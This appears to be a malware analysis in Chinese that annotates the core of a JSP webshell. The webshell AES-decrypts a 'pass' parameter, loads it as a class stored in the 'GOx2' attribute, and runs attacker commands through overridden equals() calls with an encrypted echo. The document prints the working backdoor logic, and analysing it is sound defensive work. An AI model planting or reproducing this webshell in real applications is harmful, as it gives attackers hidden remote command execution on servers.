try {
byte[] data = base64Decode(request.getParameter(pass)); #HTTP请求中的参数 pass
data = x(data, false); #AES解密
if (application.getAttribute("GOx2") == null) { #GOx2是Webshell 代码动态设置的,用于存储特定的数据或对象
application.setAttribute("GOx2", new X(this.getClass().getClassLoader()).Q(data)); #从字节数组 data 中加载一个类,存储在 "GOx2" 的属性中。应该是对equals的重写
} else {
java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream(); #动态存储输出流
Object f = ((Class) application.getAttribute("GOx2")).newInstance(); #把第一次请求的GOx2存储的类,赋值给对象f
f.equals(request); #执行恶意请求
f.equals(arrOut); #在equals方法中,恶意代码会检查obj是否是ByteArrayOutputStream实例。如果是,它可能会执行写入数据
f.equals(data);
response.getWriter().write(md5.substring(0, 16)); #先传入 request 可能是为了准备一些数据或环境,然后传入 arrOut 进行某些输出操作,最后传入 data 执行最终的恶意代码。
f.toString();
response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); #加密回显
response.getWriter().write(md5.substring(16)); #混淆与隐藏
}
} catch(Exception e) {}
是一个后门或Webshell,AES加密保护,使用预定义的密钥 xc 进行解密
先获取HTTP请求中的参数 pass,然后AES解密
第一次请求,pass解密之后是对equals的重写,因为GOx2为空,就存储在 "GOx2" 的属性中,方便后面调用
第二次请求才是真正的命令执行,因为GOx2已经有值,所以执行else,先调用GOx2中重写的equals给f进行命令执行
为什么是三次
f.equals(request);requst可能有除了pass其他恶意命令,准备一些数据或环境或者可能和pass(传入data)的内容进行拼接使用
f.equals(request);、f.equals(data);可以是联合共同执行命令
f.equals(arrOut);传出恶意代码,会检查obj是否是ByteArrayOutputStream实例。如果是,它可能会执行写入数据
最后response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); 加密回显